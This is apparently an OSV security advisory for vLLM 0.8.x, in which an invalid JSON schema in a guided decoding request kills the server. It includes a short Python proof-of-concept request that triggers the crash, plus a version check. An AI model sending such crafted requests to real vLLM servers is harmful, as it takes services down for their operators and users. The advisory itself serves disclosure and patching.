PYSEC-2025-54

Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/vllm/PYSEC-2025-54.yaml
JSON Data
https://api.test.osv.dev/v1/vulns/PYSEC-2025-54
Aliases
Published
2025-05-30T19:15:30Z
Modified
2025-06-26T21:43:40.452295Z
Summary
[none]
Details

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a guided decoding parameter kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which concerns an invalid regex rather than an invalid JSON schema. Version 0.9.0 fixes the issue.
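
The crash path is triggered by a single HTTP request. Below is a minimal sketch, not taken from the advisory, of such a request against a local vLLM OpenAI-compatible server; the host, port, model name, and the deliberately invalid schema value are illustrative assumptions, and the guided_json field follows vLLM's guided decoding request extensions.

import requests  # third-party HTTP client, assumed installed

# Illustrative values only: host, port, and model name are assumptions.
payload = {
    "model": "my-model",
    "prompt": "Say hello",
    "max_tokens": 16,
    # vLLM accepts guided decoding parameters such as guided_json in the
    # request body; a value that is not a valid JSON schema is the condition
    # the advisory describes as crashing affected 0.8.x servers.
    "guided_json": {"type": "not-a-valid-schema-type"},
}

resp = requests.post("http://localhost:8000/v1/completions", json=payload, timeout=30)
print(resp.status_code, resp.text)

On a patched (0.9.0 or later) server this should return an error response rather than take the process down.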

References

Affected packages

PyPI / vllm

Affected ranges

Type: GIT
Repo: https://github.com/vllm-project/vllm
Events:
  Introduced: 0 (unknown introduced commit; all previous commits are affected)
  Fixed:

Type: ECOSYSTEM
Events:
  Introduced: 0.8.0
  Fixed: 0.9.0
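
The ECOSYSTEM range above translates to 0.8.0 <= installed version < 0.9.0. A minimal sketch of a local check, assuming the package is installed as "vllm" and that the third-party packaging library is available for PEP 440 version comparison:

from importlib.metadata import version
from packaging.version import Version

installed = Version(version("vllm"))
# The affected ECOSYSTEM range: introduced at 0.8.0, fixed in 0.9.0.
is_affected = Version("0.8.0") <= installed < Version("0.9.0")
print(f"vllm {installed} affected by PYSEC-2025-54: {is_affected}")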

Affected versions

0.*

0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1